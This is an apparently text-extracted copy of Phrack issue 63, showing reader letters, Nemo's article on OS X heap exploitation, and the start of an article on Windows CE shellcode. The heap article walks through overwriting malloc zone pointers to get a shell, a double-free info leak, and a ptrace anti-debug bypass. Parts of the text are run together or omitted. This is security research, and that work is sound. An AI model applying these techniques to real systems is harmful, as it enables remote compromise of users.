140
PHRACK Released at WhatTheHack2005 in the Netherlands

PHRACK 63 FINAL-2005!07!23 Phrack Revision 0.4

Embed Size (px)

Citation preview

PHRACKReleased at WhatTheHack2005 in the NetherlandsTABLE OF CONTENTS6 Loopback, phrackstaff9 Linenoise, phrackstaff10 OSX Heap Exploitation Techniques, Nemo23 Hacking Windows CE, San34 Playing Games with Kernel Memory...FreeBSD Style, Joseph Kong40 Raising The Bar For Windows Rootkit Detection, Jamie Butler & Sherri Sparks55 Embedded ELF Debugging, ELFsh Crew56 Hacking Grub for Fun and Proft, CoolQ63 Antiforensic Evolution: S.E.L.F., Ripe & Pluf64 Process Dump and Binary Reconstruction, ilo--75 Next-Generation Runtime Binary Encryption, Zeljko Vrba86 Shifting the Stack Pointer, Andrew Griffths87 NT Shellcode Prevention Demystifed, Piotr Bania101Hardware Cryptography Primer, gab102PowerPC Cracking on OSX with GDB, curious107 Hacking with Embedded Systems, Chui Yew Leong119 Process Hiding & The Linux 2.4 Scheduler, Ubra127 Breaking Through a Firewall, Soungjoo Han>>Phrack World News (ezine only), phrackstaffwww.phrack.orq 4PHRACKISSUE #63__________________________Editor:[email protected]:[email protected]:[email protected] World News:[email protected]: You must put the word ANTISPAMsomewhere in the Subject-line of your email. All others will meet their master in /dev/null. We reply to every mail. Lame emails make it into Loopback.__________________________Phrack Magazine Volume 11 Issue No. 63July 15, 2005ISBN M-AY-BES00N__________________________Artwork Contributor:Eddie Piskor, Fyodor Yarochkin, Sirtub, Halvar, Team GobblesAll images, unless otherwise noted, are stolen. None of the owners were ask for permission to print or reproduce the whole or part of the artwork.__________________________Contents Copyright (c) 2005 Phrack Magazine.All Rights Reserved.Nothing may be reproduced in whole or in part without the prior written permission from the editors. Phrack Magazine is made available to the public, as often as possible, free of charge.__________________________Download Phrack e-zine athttp://www.phrack.orgWow people. We received so much feedback since we announced that this is our fnal issue. Im thrilled. We are hated by so many (hi Mr. Government) and loved but so few. And yet its because of the few what kept us alive.____________________________Phrack helped me survive the crazyness and boredom inherent in The Mans system. Big thanks to all authors, editors and han-garounds of Phrack, past and present. --- Kurisuteru[...]____________________________Guys,ifitwasntforyou,theinternetwouldntbethesame, ourwhole lifes wouldnt be the same. I wish you all the best luck thereisinyourfuture.Godblessyouallandgoodbye!!!!!--- wolfnux[Ihopethereisagod.Theremustbe.BecauseIranthis magazine.Ifoughtagainstunjustice,opressionandagainst all those who wanted to shut us down. I fought against stu-pidity and ignorance. I shook hands with the devil. I have seen him,IhavesmelledhimandIhavetouchedhim.Iknowthe devil exists and therefore I know there is a God.]____________________________youre the frst zine that i ever readed and you have a special placeinmyheart...youbuildmymind!!Thanksyouall!!!! --- thenucker/xy[This brotherhood will continue...]____________________________Couldyoupleaseremovemypersonalinfofromthisissue? http://www.phrack.org/phrack/52/P52-02Thanks in advance.Itai Dor-On [ mtst1.c#include int main(int ac, char **av){char *a = malloc(10);__asm(trap);char *b = malloc(10);}-[nemo@gir:~]$ gcc mtst1.c -o mtst1-[nemo@gir:~]$ gdb ./mtst1GNU gdb 6.1-20040303 (Apple version gdb-413)(gdb) rStarting program: /Users/nemo/mtst1 Reading symbols for shared libraries . doneOnce we receive a SIGTRAP signal and return to the gdb command shell we can then use the commandshownbelowtolocateourinitial szone_t structure in the process memory. (gdb) x/x &initial_malloc_zones0xa0010414 :0x01800000This value, as expected inside gdb, is shown to be0x01800000.If wedumpmemoryatthis location,wecanseeeachof thefeldsinthe _malloc_zone_t_ struct as expected.NOTE: Output reformatted for more clarity. (gdb) x/x (long*) initial_malloc_zones[content omitted, please see electronic version]Inthisstructwecanseeeachof thefunction pointerswhicharecalledforeachof the memoryallocation/deallocationfunctions performed using the default zone. As well as a pointer to the name ofthe zone, which can be useful for debugging.Ifwe change the malloc() function pointer, and continueoursampleprogram(shownbelow) wecanseethatthesecondcalltomalloc() resultsinajumptothespecifedvalue.(after instruction alignment).www.phrack.orq 12Destroying The Apple Heap For Fun And Profit(gdb) set *0x180000c = 0xdeadbeef(gdb) jump *($pc + 4)Continuing at 0x2cf8.Program received signal EXC_BAD_ACCESS, Could not access memory.Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec0xdeadbeec in ?? ()(gdb) But is it really feasible to write all the way to the address 0x1800000? (or 0x2800000 outside ofgdb). We will look into this now.First we will check the addresses various sized memoryallocationsaregiven.Thelocation of eachbufferisdependantonwhetherthe allocation size falls into one ofthe various sized bins mentioned earlier (tiny, small or large).Totestthelocationof eachof thesewecan simplycompileandrunthefollowingsmallc program as shown:-[nemo@gir:~]$ cat > mtst2.c#include #include int main(int ac, char **av){extern *malloc_zones;printf(initial_malloc_zones @ 0x%x\n, *malloc_zones);printf(tiny:%p\n, malloc(22));printf(small: %p\n, malloc(500));printf(large: %p\n, malloc(0xffffffff));return 0;}-[nemo@gir:~]$ gcc mtst2.c -o mtst2-[nemo@gir:~]$ ./mtst2 initial_malloc_zones @ 0x2800000tiny:0x500160small: 0x2800600large: 0x26000Fromtheoutputof thisprogramwecansee thatitisonlypossibletowritetotheinitial_malloc_zonesstructfromatinyorlarge buffer. Also, in order to overwrite the function pointers contained within this struct we need to write a considerable amount ofdata completely destroyingsectionsof thezone.Thankfully many situations exist in typical software which allow these criteria to be met. This is discussed in the fnal section ofthis paper.Nowweunderstandthelayoutof theheapa little better, we can use a small sample program to overwrite the function pointers contained in the struct to get a shell. The following program allocates a tiny buffer of22 bytes. It then uses memset() to write As allthewaytothepointerformalloc()inthe zone struct, before calling malloc().[content omitted, please see electronic version]Howeverwhenwecompileandrunthis program,anEXC_BAD_ACCESSsignalis received.(gdb) rStarting program: /Users/nemo/mtst3 Reading symbols for shared libraries . done[+] tinyp is @ 0x300120[+] initial_malloc_zones is @ 0x1800000[+] Copying 0x14ffef0 bytes.Program received signal EXC_BAD_ACCESS, Could not access memory.Reason: KERN_INVALID_ADDRESS at address: 0x004050000xffff9068 in ___memset_pattern () This is due to the fact that, in between the tinyp pointer and the malloc function pointer we are tryingtooverwritethereissomeunmapped memory. In order to get past this we can use the fact that blocks ofmemory allocated which fall into the large category are allocated using the mach vm_allocate() syscall. www.phrack.orq 13Destroying The Apple Heap For Fun And ProfitIfwe can get enough memory to be allocated inthelargeclassifcation,beforetheoverfow occursweshouldhaveaclearpathtothe pointer.To illustrate this point, we can use the following code:[content omitted, please see electronic version]Thiscodeallocatesenoughlargeblocksofmemory(0xffffffff)withwhichtoplowaclear path to the function pointers. It then copies the addressof theshellcodeintomemoryallthe waythroughthezonebeforeoverwritingthe function pointers in the szone_t struct. Finally a call to malloc() is made in order to trigger the execution ofthe shellcode.As you can see below, this code function as wed expect and our shellcode is executed.-[nemo@gir:~]$ ./heaptst [+] malloc_zones (first zone) @ 0x2800000[+] addr @ 0x500120[+] addr + 36699872 = 0x2800000[+] Using shellcode @ 0x3014[+] finished memcpy()sh-2.05b$ This method has been tested on Apples OSX version 10.4.1 (Tiger).4 - A Real Life ExampleThedefaultwebbrowseronOSX(Safari)as wellasthemailclient(Mail.app),Dashboard andalmosteveryotherapplicationonOSX whichrequireswebparsingfunctionality achieve this through a library which Apple call WebKit. (2)Thislibrarycontainsmanybugs,manyofwhichareexploitableusingthistechnique. Particularattentionshouldbepayedtothe codewhichrenders blocks ;) Duetothenatureof HTMLpagesan attackerispresentedwithopportunitiesto controltheheapinavarietyof waysbefore actuallytriggeringtheexploit.Inorderto usethetechniquedescribedinthispaperto exploitthesebugswecancraftsomeHTML code, or an image fle, to perform many large allocations and therefore cleaving a path to our functionpointers.Wecanthentriggeroneofthe numerous overfows to write the address ofour shellcode into the function pointers before waiting for a shell to be spawned.One ofthe bugs which i have exploited using thisparticularmethodinvolvesanunchecked length being used to allocate and fll an object in memory with null bytes (\x00). If wemanagetocalculatethewritesothatit stopsmidwaythroughoneof ourfunction pointers in the szone_t struct, we can effectively truncate the pointer causing execution to jump elsewhere.Thefrststeptoexploitingthisbug,istofre up the debugger (gdb) and look at what options are available to us.Once we have Safari loaded up in our debugger, the frst thing we need to check for the exploit tosucceedisthatwehaveaclearpathtothe initial_malloc_zonesstruct.Todothisin gdbwecanputabreakpointonthereturn statement in the malloc() function. Weusethecommanddisasmalloctoview theassemblylistingforthemallocfunction. The end ofthis listing is shown below:[see electronic version phrackstaff]The blr instruction shown at line 0x900039f0 is the branch to link register instruction. This www.phrack.orq 14Destroying The Apple Heap For Fun And Profitinstruction is used to return from malloc().FunctionsinOSXonPPCarchitecturepass their return value back to the calling function in the r3 register. In order to make sure that the malloc()ed addresses have reached the address ofour zone struct we can put a breakpoint on thisinstruction,andoutputthevaluewhich was returned.We can do this with the gdb commands shown below.(gdb) break *0x900039f0 Breakpoint 1 at 0x900039f0(gdb) commandsType commands for when breakpoint 1 is hit, one per line.End with a line saying just end.>i r r3>cont>endWe can now continue execution and receive a running status ofall allocations which occur in ourprogram.Thiswaywecanseewhenour target is reached.Theheaptoolcanalsobeusedtoseethe sizes and numbers ofeach allocation.There are several methods which can be used tosetuptheheapcorrectlyforexploitation. Onemethod,suggestedbyandrewg,isto usea.pngimageinordertocontrolthesizes of allocationswhichoccur.Apparentlythis methodwaslearntfromzen-parsewhen exploiting a mozilla bug in the past.Themethodwhichihaveusedistocreate anHTMLpagewhichrepeatedlytriggers theoverfowwithvarioussizes.Afterplaying aroundwiththisforawhile,itwaspossible toregularlyallocateenoughmemoryforthe overfow to occur.Oncethelimitisreached,itispossibleto trigger the overfow in a way which overwrites the frst few bytes in any ofthe pointers in the szone_t struct. Becauseof thebigendiannatureof PPC architecture(bydefault.itcanbechanged.) thefrstfewbytesinthepointermakeallthe difference and our truncated pointer will now point to the .TEXT segment. Thefollowinggdboutputshowsourinitial_malloc_zonesstructaftertheheaphasbeen smashed.(gdb) x/x (long )*&initial_malloc_zones0x1800000: 0x00000000 // Reserved1.(gdb)0x1800004: 0x00000000 // Reserved2.(gdb)0x1800008: 0x00000000 // size() pointer.(gdb)0x180000c: 0x00003abc // malloc() pointer.(gdb)^^ smash stopped here.0x1800010: 0x90008bc4Asyoucansee,themalloc()pointerisnow pointing to somewhere in the .TEXT segment, and the next call to malloc() will take us there. Wecanusegdbtoviewtheinstructionsat thisaddress.Asyoucanseeinthefollowing example.(gdb) x/2i 0x00003abc0x3abc: lwz r4,0(r31)0x3ac0: bl0xd686c Here we can see that the r31 register must be avalidmemoryaddressforastartfollowing thisthedyld_stub_objc_msgSend()function iscalledusingthebl(branchupdatinglink register)instruction.Againwecanusegdbto view the instructions in this function.(gdb) x/4i 0xd686c0xd686c : lis r11,140xd6870 : lwzur12,-31732(r11)www.phrack.orq 1bDestroying The Apple Heap For Fun And Profit0xd6874 : mtctr r120xd6878 :bctrWecanseeintheseinstructionsthatther11 register must be a valid memory address. Other thanthatthefnaltwoinstructions(0xd6874 and 0xd6878) move the value in the r12 register tothecontrolregister,beforebranchingtoit. This is the equivilant ofjumping to a function pointer in r12. Amazingly this code construct is exactly what we need. So all that is needed to exploit this vulnerability now, is to fnd somewhere in the binary where the r12 register is controlled by the user, directly before the malloc function is called. Although this isnt terribly easy to fnd, it does exist.However, ifthis code is not reached before one ofthe pointers contained on the (now smashed) heap is used the program will most likely crash before we are given a chance to steal execution fow.Becauseof thisfact,andbecauseof the diffcultnatureof predictingtheexactvalues withwhichtosmashtheheap,exploitingthis vulnerability can be very unreliable, however it defnitely can be done.Program received signal EXC_BAD_ACCESS, Could not access memory.Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec0xdeadbeec in ?? ()(gdb)Anexploitforthisvulnerabilitymeansthata crafted email or website is all that is needed to remotely exploit an OSX user.Apple have been contacted about a couple ofthese bugs and are currently in the process offxing them.TheWebKitlibraryisopensourceand available for download, apparently it wont be toolongbeforeNokiaphonesusethislibrary for their web applications. [5]5 - MiscellaneousThissectionshowsacoupleof situations/ observationsregardingthememoryallocator whichdidnotftintoanyof theother sections.5.1 - Wrap-around Bug.The examples in this paper allocated the value 0xffffffff. However this amount is not technically feasible for a malloc implementation to allocate each time.The reason this works without failure is due to a subtle bug which exists in the Darwin kernels vm_allocate() function.Thisfunctionattemptstoroundthedesired sizeituptotheclosestpagealignedvalue. However it accomplishes this by using the vm_map_round_page() macro (shown below.)#define PAGE_MASK (PAGE_SIZE - 1)#define PAGE_SIZE vm_page_size#define vm_map_round_page(x) \(((vm_map_offset_t)(x) + \ PAGE_MASK) & \~((signed)PAGE_MASK))Here we can see that the page size minus one issimplyaddedtothevaluewhichistobe rounded before being bitwise ANDed with the reverse ofthe PAGE_MASK.The effect ofthis macro when rounding large valuescanbeillustratedusingthefollowing code:#include #define PAGEMASK 0xfff#define vm_map_round_page(x) \((x + PAGEMASK) & ~PAGEMASK)int main(int ac, char **av)THIS PAGE HAS BEEN CENSOREDBY THE DMCAhttp://www.eff.orgwww.phrack.orq 17Destroying The Apple Heap For Fun And Profit{printf(0x%x\n,vm_map_round_page(0xffffffff));}When run (below) it can be seen that the value 0xffffffffwill be rounded to 0.-[nemo@gir:~]$ ./rounding0x0Directly below the rounding in vm_allocate() is performedthereisachecktomakesurethe roundedsizeisnotzero.If itiszerothenthe sizeof apageisaddedtoit.Leavingonlya single page allocated.map_size = vm_map_round_page(size);if (map_addr == 0)map_addr += PAGE_SIZE;The code below demonstrates the effect ofthis on two calls to malloc().#include #include int main(int ac, char **av){char *a = malloc(0xffffffff);char *b = malloc(0xffffffff);printf(B - A: 0x%x\n, b - a);return 0;}When this program is compiled and run (below) wecanseethatalthoughtheprogrammer believeshe/shenowhasa4GBbufferonlya single page has been allocated.-[nemo@gir:~]$ ./ovrflwB - A: 0x1000Thismeansthatmostsituationswhereauser specifedlengthcanbepassedtothemalloc() function,beforebeingusedtocopydata,are exploitable.This bug was pointed out to me by duke.5.2 - Double free().Bertrands allocator keeps track ofthe addresses whicharecurrentlyallocated.Whenabuffer isfree()edthefnd_registered_zone()function is used to make sure that the address which is requestedtobefree()edexistsinoneof the zones. This check is shown below.[content omitted, please see electronic version]Thismeansthatanaddressfree()edtwice (doublefree)willnotactuallybefree()edthe second time. Making it hard to exploit double free()s in this way.However,whenabufferisallocatedof the samesizeasthepreviousbufferandfree()ed, but the pointer to the free()ed buffer still exists and is used an exploitable condition can occur.Thesmallsampleprogrambelowshowsa pointerbeingallocatedandfree()edandthen asecondpointerbeingallocatedof thesame size. Then free()ed twice.#include #include #include int main(int ac, char **av){char *b,*a= malloc(11);printf(a: %p\n,a);free(a);b= malloc(11);printf(b: %p\n,b);free(b);printf(b: %p\n,a);free(b);printf(a: %p\n,a);return 0;}When we compile and run it, as shown below, www.phrack.orq 1BDestroying The Apple Heap For Fun And Profitwecanseethatpointerastillpointstothe same address as b, even after it was free()ed. Ifthis condition occurs and we are able to write to,or read from, pointer a, we may be able to exploit this for an info leak, or gain control ofexecution.-[nemo@gir:~]$ ./dfra: 0x500120b: 0x500120b: 0x500120tst(3575) malloc: *** error for object 0x500120: double freetst(3575) malloc: *** set a breakpoint in szone_error to debuga: 0x500120Ihavewrittenasmallsampleprogramto explain more clearly how this works. The code below reads a username and password from the user. It then compares password to one stored in the fle .skrt. Ifthis password is the same, the secret code is revealed. Otherwise an error is printed informing the user that the password was incorrect.[content omitted, please see electronic version]Whenwecompiletheprogramandenter anincorrectpasswordweseethefollowing message:-[nemo@gir:~]$ ./dfreelogin: nemoEnter your password:Password Rejected for nemo, please try again.However, ifthe admin_ string is detectedin the string, the user buffer is free()ed. The skrt buffer is then returned from malloc() pointing to the same allocated block ofmemory as the user pointer. This would normally be fne however theuserbufferisusedintheprintf()function call at the end ofthe function. Because the user pointer still points to the same memory as skrt this causes an info-leak and the secret password is printed, as seen below:-[nemo@gir:~]$ ./dfreelogin: admin_nemoAdmin user not allowed!Password Rejected for secret_password, please try again.Wecanthenusethispasswordtogetthe combination:-[nemo@gir:~]$ ./dfreelogin: nemoEnter your password:The combination is 2C,4B,5C5.3 - Beating ptrace()Safariusestheptrace()syscalltotryandstop evilhackersfromdebuggingtheirproprietary code. ;). The extract from the man-page below shows a ptrace() fag which can be used to stop people being able to debug your code.[content omitted, please see electronic version]There are a couple ofways to get around this check (which i am aware of). The frst ofthese is to patch your kernel to stop the PT_DENY_ATTACHcallfromdoinganything.Thisis probablythebestway,howeverinvolvesthe most effort.The method which we will use now to look at Safariistostartupgdbandputabreakpoint on the ptrace() function. This is shown below:-[nemo@gir:~]$ gdb /Applications/Safari.app/Contents/MacOS/SafariGNU gdb 6.1-20040303 (Apple version gdb-413) (gdb) break ptraceBreakpoint 1 at 0x900541f4Wethenruntheprogram,andwaituntilthe breakpointishit.Whenourbreakpointis triggered,weusethex/10i$pccommand (below) to view the next 10 instructions in the function.www.phrack.orq 19Destroying The Apple Heap For Fun And Profit[content omitted, please see electronic version]At line 0x90054204 we can see the instruction scbeingexecuted.Thisistheinstruction whichcallsthesyscallitself.Thisissimilarto int0x80onalinuxplatform,orsysenter/int 0x2e in windows. Inordertostoptheptrace()syscallfrom occurring we can simply replace this instruction in memory with a nop (no operation) instruction. This way the syscall will never take place and we can debug without any problems.Topatchthisinstructioningdbwecanuse thecommandshownbelowandcontinue execution.(gdb) set *0x90054204 = 0x60000000(gdb) continue6 - ConclusionAlthough the technique which was described in this paper seem rather specifc, the technique is still valid and exploitation ofheap bugs in this way is defnitly possible.When you are able to exploit a bug in this way youcanquicklyturnacomplicatedbuginto the equivilant ofa simple stack smash (3).At the time ofwriting this paper, no protection schemesfortheheapexistforMacOSX which would stop this technique from working. (To my knowledge).Onasidenote,if anyoneworksoutwhythe initial_malloc_zonesstructisalwayslocated at0x2800000outsideof gdband0x1800000 inside i would appreciate it ifyou let me know.IdliketosaythankstomybossSwarajfrom Suresec LTD for giving me time to research the things which i enjoy so much.IdalsoliketosayhitoalltheguysatFeline Menace,aswellaspulltheplug.org/#social andtheRuxconteam.Idalsoliketothank the Chelsea for providing the AU felinemenace guys with buckets ofcorona to fuel our hacking. Thanksaswelltodukeforpointingoutthe vm_allocate() bug and ilja for discussing all ofthis with me on various occasions.Free wd jail mitnick! www.phrack.orq 21Hacking Windows CEHacking Windows CEsan 1 - AbstractThenetworkfeaturesof PDAsandmobiles arebecomingmoreandmorepowerful,so theirrelatedsecurityproblemsareattracting moreandmoreattentions.Thispaperwill show a buffer overfow exploitation example in WindowsCE.Itwillcoverknowledgesabout ARMarchitecture,memorymanagement andthefeaturesof processesandthreadsofWindowsCE.Italsoshowshowtowritea shellcode in Windows CE, including knowledges about decoding shellcode ofWindows CE with ARM processor.2 - Windows CE OverviewWindowsCEisaverypopularembedded operating system for PDAs and mobiles. As the name, its developed by Microsoft. Because ofthe similar APIs, the Windows developers can easilydevelopeapplicationsforWindowsCE. Maybe this is an important reason that makes Windows CE popular. Windows CE 5.0 is the latestversion,butWindowsCE.net(4.2)isthe most useful version, and this paper is based on Windows CE.net.Formarketingreason,WindowsMobile SoftwareforPocketPCandSmartphoneare consideredasindependentproducts,butthey are also based on the core ofWindows CE.Bydefault,WindowsCEisinlittle-endian mode and it supports several processors.3 - ARM ArchitectureARMprocessoristhemostpopularchipin PDAs and mobiles, almost all ofthe embedded devicesuseARMasCPU.ARMprocessors aretypicalRISCprocessorsinthatthey implementaload/storearchitecture.Only load and store instructions can access memory. Data processing instructions operate on register contents only.Therearesixmajorversionsof ARM architecture. These are denoted by the version numbers 1 to 6.ARM processors support up to seven processor modes, depending on the architecture version. Thesemodesare:User,FIQ-FastInterrupt Request,IRQ-InterruptRequest,Supervisor, Abort,UndefnedandSystem.TheSystem mode requires ARM architecture v4 and above. All modes except User mode are referred to as privilegedmode.Applicationsusuallyexecute in User mode, but on Pocket PC all applications appeartoruninkernelmode,andwelltalk about it late.ARMprocessorshave37registers.The registersarearrangedinpartiallyoverlapping banks.Thereisadifferentregisterbankfor eachprocessormode.Thebankedregisters giverapidcontextswitchingfordealing withprocessorexceptionsandprivileged operations. InARMarchitecturev3andabove,there are30general-purpose32-bitregisters,the programcounter(pc)register,theCurrent Program Status Register(CPSR) and fve Saved ProgramStatusRegisters(SPSRs).Fifteen general-purposeregistersarevisibleatany one time,depending onthe current processor mode.Thevisiblegeneral-purposeregisters are from r0 to r14.www.phrack.orq 22Hacking Windows CEBy convention, r13 is used as a stack pointer(sp) in ARM assembly language. The C and C++ compilers always use r13 as the stack pointer.InUsermodeandSystemmode,r14isused as a link register(lr) to store the return address when a subroutine call is made. It can also be used as a general-purpose register ifthe return address is stored in the stack.The program counter is accessed as r15(pc). It is incremented by four bytes for each instruction inARMstate,orbytwobytesinThumb state. Branch instructions load the destination address into the pc register.Youcanloadthepcregisterdirectlyusing dataoperationinstrutions.This featureisdifferentfromother processorsanditisusefulwhile writting shellcode.4-WindowsCEMemoryManage-mentUnderstandingmemory managementisveryimportant forbufferoverfowexploit. ThememorymanagementofWindowsCEisverydifferent fromotheroperatingsystems, even other Windows systems. WindowsCEusesROM(read onlymemory)andRAM (random access memory).TheROMstorestheentire operatingsystem,aswellasthe applicationsthatarebundled withthesystem.Inthissense, theROMinaWindowsCE systemislikeasmallread-only hard disk. The data in ROM can be maintianed without power ofbattery.ROM-basedDLLfles canbedesignatedasExecuteinPlace.XIP isanewfeatureof WindowsCE.net.That is,theyreexecuteddirectlyfromtheROM insteadof beingloadedintoprogramRAM andthenexecuted.Itisabigadvantagefor embbedsystems.TheDLLcodedoesnttake up valuable program RAM and it doesnt have to be copied into RAM before its launched. So ittakeslesstimetostartanapplication.DLL flesthatarentinROMbutarecontainedin the object store or on a Flash memory storage cardarentexecutedinplace;theyrecopied into the RAM and then executed.The RAM in a Windows CE system is divided intotwoareas:programmemoryandobject store.+----------------------------------------+ 0xFFFFFFFF| | |Kernel Virtual Address: || | 2 |KPAGE Trap Area,|| | G |KDataStruct, etc|| | B |... || | |--------------------------------+ 0xF0000000| 4 | K |Static Mapped Virtual Address || G | E |... || B | R |... || | N |--------------------------------+ 0xC4000000| V | E |NK.EXE|| I | L |--------------------------------+ 0xC2000000| R | |... || T | |... || U |---|--------------------------------+ 0x80000000| A | |Memory Mapped Files || L | 2 |... || | G |--------------------------------+ 0x42000000| A | B |Slot 32 Process 32|| D | |--------------------------------+ 0x40000000| D | U |... || R | S |--------------------------------+ 0x08000000| E | E |Slot 3DEVICE.EXE|| S | R |--------------------------------+ 0x06000000| S | |Slot 2FILESYS.EXE || | |--------------------------------+ 0x04000000| | |Slot 1XIP DLLs|| | |--------------------------------+ 0x02000000| | |Slot 0Current Process |+---+---+--------------------------------+ 0x00000000Figure 1www.phrack.orq 23Hacking Windows CEThe object store can be considered something like a permanent virtual RAM disk. Unlike the RAM disks on a PC, the object store maintians the fles stored in it even ifthe system is turned off. This is the reason that Windows CE divices typicallyhaveamainbatteryandabackup battery.TheyprovidepowerfortheRAMto maintain the fles in the object store. Even when the user hits the reset button, the Windows CE kernel starts up looking for a previously created objectstoreinRAMandusesthatstoreif it fnds one.Anotherareaof theRAMisusedforthe programmemory.Programmemoryisused like the RAM in personal computers. It stores theheapsandstacksfortheapplicationsthat are running. The boundary between the object store and the program RAM is adjustable. The user can move the dividing line between object storeandprogramRAMusingtheSystem Control Panel applet.WindowsCEisa32-bit operating system, so it supports 4GB virtual address space. The layout is illustrated by Figure 1.The upper 2GB is kernel space, usedbythesystemforitsown data. And the lower 2GB is user space.From0x42000000to below0x80000000memories areusedforlargememory allocations,suchasmemory-mappedfles,objectstore isinhere.From0tobelow 0x42000000memoriesare dividedinto33slots,eachofwhich is 32MB.Slot 0 is very important; its for thecurrentlyrunningprocess. The virtual address space layout is illustrated by Figure 2.First 64 KB reserved by the OS. The process code and data are mapped from 0x00010000, thenfollowedbystacksandheaps.DLLs loadedintothetopaddress.Oneof thenew featuresof WindowsCE.netistheexpansion of anapplicationsvirtualaddressspacefrom 32 MB, in earlier versions ofWindows CE, to 64 MB, because the Slot 1 is used as XIP.5 - Windows CE Processes and ThreadsWindows CE treats processes in a different way fromotherWindowssystems.WindowsCE limits 32 processes being run at any one time. When the system starts, at least four processes arecreated:NK.EXE,whichprovidesthe kernel service, its always in slot 97; FILESYS.EXE,whichprovidesflesystemservice,its alwaysinslot2;DEVICE.EXE,whichloads andmaintainsthedevicedriversforthe system,itsinslot3normally;andGWES.EXE,whichprovidestheGUIsupport,itsin slot4normally.Theotherprocessesarealso +---+------------------------------------+ 0x02000000| | DLL Virtual Memory Allocations || S | +--------------------------------|| L | |ROM DLLs:R/W Data || O | |--------------------------------|| T | |RAM DLL+OverFlow ROM DLL: || 0 | |Code+Data || | +--------------------------------|| C +------+-----------------------------|| U|A|| RV||| R +-------------------------+----------|| E |General Virtual Memory Allocations|| N | +--------------------------------|| T | |Process VirtualAlloc() calls|| | |--------------------------------|| P | | Thread Stack || R | |--------------------------------|| O | | Process Heap || C | |--------------------------------|| E | | Thread Stack || S |---+--------------------------------|| S |Process Code and Data || |------------------------------------+ 0x00010000| |Guard Section(64K)+UserKInfo|+---+------------------------------------+ 0x00000000Figure 2www.phrack.orq 24Hacking Windows CEstarted, such as EXPLORER.EXE.Shellisaninterestingprocessbecauseits notevenintheROM.SHELL.EXEisthe WindowsCEsideof CESH,thecommand line-based monitor. The only way to load it is by connecting the system to the PC debugging stationsothattheflecanbeautomatically downloadedfromthePC.Whenyouuse PlatformBuildertodebugtheWindowsCE system,theSHELL.EXEwillbeloadedinto the slot after FILESYS.EXE.ThreadsunderWindowsCEaresimilarto threadsunderotherWindowssystems.Each process at least has a primary thread associated with it upon starting even ifit never explicitly createdone.Andaprocesscancreateany number ofadditional threads, its only limited by available memory.Eachthreadbelongstoaparticularprocess andsharesthesamememoryspace.But SetProcPermissions(-1) gives the current thread access to any process. Each thread has an ID, a private stack and a set ofregisters. The stack size ofall threads created within a process is set by the linker when the application is compiled.The IDs ofprocess and thread in Windows CE arethehandlesof thecorrespondingprocess andthread.Itsfunny,butitsusefulwhile programming.When a process is loaded, system will assign the nextavailableslottoit.DLLsloadedintothe slot and then followed by the stack and default process heap. After this, then executed.Whenaprocessthreadisscheduled,system will copy from its slot into slot 0. It isnt a real copy operation; it seems just mapped into slot 0.Thisismappedbacktotheoriginalslot allocated to the process ifthe process becomes inactive. Kernel, fle system, windowing system all runs in their own slotsProcessesallocatestackforeachthread, thedefaultsizeis64KB,dependingonlink parameter when the program is compiled. The top 2KB is used to guard against stack overfow, wecanntdestroythismemory,otherwise,the system will freeze. And the remained available for use.Variablesdeclaredinsidefunctionsare allocated in the stack. Threads stack memory is reclaimed when it terminates.6 - Windows CE API Address Search TechnologyWe must have a shellcode to run under Windows CE before exploit. Windows CE implements as Win32 compatibility. Coredll provides the entry points for most APIs supported by Windows CE. So it is loaded by every process. The coredll.dll is just like the kernel32.dll and ntdll.dll ofother Win32systems.Wehavetosearchnecessary API addresses from the coredll.dll and then use theseAPIstoimplementourshellcode.The traditionalmethodtoimplementshellcode under other Win32 systems is to locate the base addressof kernel32.dllviaPEBstructureand then search API addresses via PE header.Firstly, we have to locate the base address ofthe coredll.dll. Is there a structure like PEB under Windows CE? The answer is yes. KDataStruct isanimportantkernelstructurethatcan beaccessedfromusermodeusingthefxed addressPUserKDataanditkeepsimportant systemdata,suchasmodulelist,kernelheap, and API set pointer table (SystemAPISets).KDataStruct is defned in nkarm.h:[content omitted, please see electronic version]Thevalueof PUserKDataisfxedas 0xFFFFC800ontheARMprocessor,and 0x00005800 on other CPUs. The last member www.phrack.orq 2bHacking Windows CEofKDataStruct is aInfo. It offsets 0x300 from thestartaddressof KDataStructstructure. MemberaInfoisaDWORDarray,thereis apointertomodulelistinindex9(KINX_MODULES), and its defned in pkfuncs.h. So offsets 0x324 from 0xFFFFC800 is the pointer to the module list.Well,letslookattheModulestructure.I marked the offsets ofthe Module structure as following:[content omitted, please see electronic version]Modulestructureisdefnedinkernel.h. Thethirdmemberof Modulestructureis lpszModName,whichisthemodulename string pointer and it offsets 0x08 from the start of theModulestructure.TheModulename isunicodestring.ThesecondmemberofModule structure is pMod, which is an address that point to the next module in chain. So we canlocatethecoredllmodulebycomparing the unicode string ofits name.Offsets 0x74 from the start ofModule structure has an e32 member and it is an e32_lite structure. Letslookatthee32_litestructure,which defnedinpehdr.h.Inthee32_litestructure, member e32_vbase will tell us the virtual base address ofthe module. It offsets 0x7c from the start ofModule structure. We alse noticed the member ofe32_unit[LITE_EXTRA], it is an info structure array. LITE_EXTRA is defned to 6 in the head ofpehdr.h, only the frst 6 used by NK and the frst is export table position. So offsets 0x8c from the start ofModule structure isthevirtualrelativeaddressof exporttable position ofthe module.From now on, we got the virtual base address ofthe coredll.dll and its virtual relative address ofexport table position.Iwrotethefollowingsmallprogramtolistall modules ofthe system:[content omitted, please see electronic version]Inmyenvironment,theModulestructureis 0x8F453128whichinthekernelspace.Most ofPocket PC ROMs were builded with Enable FullKernelModeoption,soallapplications appear to run in kernel mode. The frst 5 bits of thePsrregisteris0x1Fwhendebugging, that means the ARM processor runs in system mode. This value defned in nkarm.h:// ARM processor modes#define USER_MODE 0x10// 0b10000#define FIQ_MODE0x11// 0b10001#define IRQ_MODE0x12// 0b10010#define SVC_MODE0x13// 0b10011#define ABORT_MODE0x17// 0b10111#define UNDEF_MODE0x1b// 0b11011#define SYSTEM_MODE 0x1f// 0b11111I wrote a small function in assemble to switch processormodebecasuetheEVCdoesnt supportinlineassemble.Theprogramwont getthevalueof BaseAddressandDllName when I switched the processor to user mode. It raised a access violate exception.I use this program to get the virtual base address of thecoredll.dllis0x01F60000without changeprocessormode.Butthisaddressis invalid when I use EVC debugger to look into and the valid data is start from 0x01F61000. I think maybe Windows CE is for the purpose ofsavememoryspaceortime,soitdoesntload the header ofdll fles.Becausewevegotthevirtualbaseaddressofthecoredll.dllanditsvirtualrelativeaddress of exporttableposition,sothroughrepeat compare the API name by 